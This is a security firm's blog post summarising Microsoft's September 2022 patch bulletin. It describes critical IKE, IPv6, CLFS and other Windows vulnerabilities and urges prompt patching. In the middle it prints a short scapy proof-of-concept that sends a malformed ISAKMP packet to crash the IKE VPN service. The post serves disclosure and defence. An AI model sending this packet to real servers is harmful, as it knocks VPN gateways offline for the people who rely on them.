Blog: Microsoft Security Bulletin of September 2022

Author: Vlad
Published on

Patrowl's blog - Microsoft Security Bulletin of September 2022

This month Microsoft’s security bulletin is quite intense, even if it does not contain anything that makes world security panic… but maybe😉

Remote code execution on VPN protocol IKE / CVE-2022-34721 and CVE-2022-34722

If you have a Windows server that acts as an IPSec VPN gateway, then it is vulnerable to 2 remote code executions, allowing full control, without authentication.

If in addition this server is exposed on the Internet… I think you’re going to have a bad weekend 😉.

CVSS score: 9.8/10.

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34721https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34722

As a bonus, here is a non-stability exploit that only crashes the service but within a few hours the exploit will be stability and exploited in the wild 😉: https://github.com/78ResearchLab/PoC/tree/main/CVE-2022-34721

The exploit source code :

from scapy.all import *
from scapy.contrib.ikev2 import *
from scapy.layers.isakmp import *

import socket, time
target = ("192.168.159.134", 500)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
pkt = ISAKMP(init_cookie=RandString(8), next_payload=0x84, exch_type=0xf3)
pkt /= ISAKMP_payload(next_payload=0x1, load=b"\x00\x00\x01\x7f")
sock.sendto(raw(pkt), target)
Please do not launch it on production servers 😄

Local privilege escalation with the log API (Windows Common Log File System / CLFS) / CVE-2022-37969

This API is accessible by any application willing to log things and this vulnerability allows to elevate its privileges but only if the attacker already has a first execution of code or partial takeover of the target (or is a teasing user 😅).

The particularity of this vulnerability is that it has been discovered by several security companies (Mandiant, Zscaler, Crowdstrike) as being exploited in the wild. Understand: customers of theirs have been hacked and this vulnerability has been used by attackers to advance attacks or directly into their malware.

Remote code execution on IPv6 / CVE-2022-34718

This one is funny because if you have a Windows system with IPv6 enabled (which is the case by default), then it is possible to send you a specially formatted network packet resulting in code execution, remotely, without authentication. And since IPv6 is at the kernel level, it’s a total takeover 🎉.

CVSS score: 9.8/10.

Unless I’m mistaken, this is a routable packet, so the vulnerability looks like it could be exploited on the Internet. Afterwards, understand Microsoft, IPv6 is recent, it has only been supported by Microsoft for 20 years 😜! (Since Windows XP and especially XP SP1) https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34718

Other vulnerabilities

There are still plenty of vulnerabilities, some of which are:

  • Code executions in Visual Studio…protect your developers 👍(CVE-2022-35777, CVE-2022-35825, CVE-2022-35826, CVE-2022-35827);
  • Privilege escalations from Exchange (mail);
  • Nice remote, unauthenticated code execution on Windows servers serving as a “PPP” VPN gateway (CVE-2022-30133);
  • Remote code execution without authentication on the Bluetooth driver 😨 . Disable your computer’s Bluetooth by default, it’s a good practice (CVE-2022-30144);
  • Unauthenticated remote code execution on the NFS file sharing service 😱 (CVE-2022-34715);
  • Remote code execution without authentication on the SMB file sharing service, both client and server 😲 (CVE-2022-35804);
  • Bypassing Excel restrictions that can be used in phishing to result in code execution (CVE-2022-33631);
  • A local elevation of privileges from the Windows Fax service. Yes yes, in 2022, the Fax… (CVE-2022-34690);
  • More vulnerabilities in the print spooler. I lost count but we must have passed the twentieth 🤯 (CVE-2022-35755, CVE-2022-35793);
  • A virtual machine breakout on Hyper-V (CVE-2022-34696);
  • A Credential Guard bypass, meant to protect your in-memory passwords and password digests (CVE-2022-34709);
  • A bypass of Windows Hello authentication, supposed to keep your computer locked 🤦‍♂️ (CVE-2022-35797);
  • Bypasses of Secure Boot, supposed to protect the boot of your computer (CVE-2022-34301 and CVE-2022-34303);
  • And finally, 16 vulnerabilities in the Chromium-Edge browser.

Finally

Finally… there are some pretty critical vulnerabilities that need to be patched quickly 😉.

Last funny point, with this bulletin, Microsoft corrects its thousandth flaw of the year, youhou.. bravo… champagne 🍾.

It’s a very nice (ironic) anniversary to celebrate the official publication of the “Cyber Resilience Act”. which will require publishers to provide security assistance, security updates and a guarantee that digital products comply with cybersecurity requirements throughout their lifecycle. But that’s another topic we’ll talk about again😉: https://twitter.com/MaliciaRogue/status/1570366397737222144

Good luck 👍

Blog: We Wanted to Talk About Cyberattacks During the Olympics, but We Have Nothing to Say

Patrowl Raises €11m in Series A Funding: Continuous Protection of Internet Exposed Assets

Blog: RegreSSHion, critical vulnerability on OpenSSH CVE-2024-6387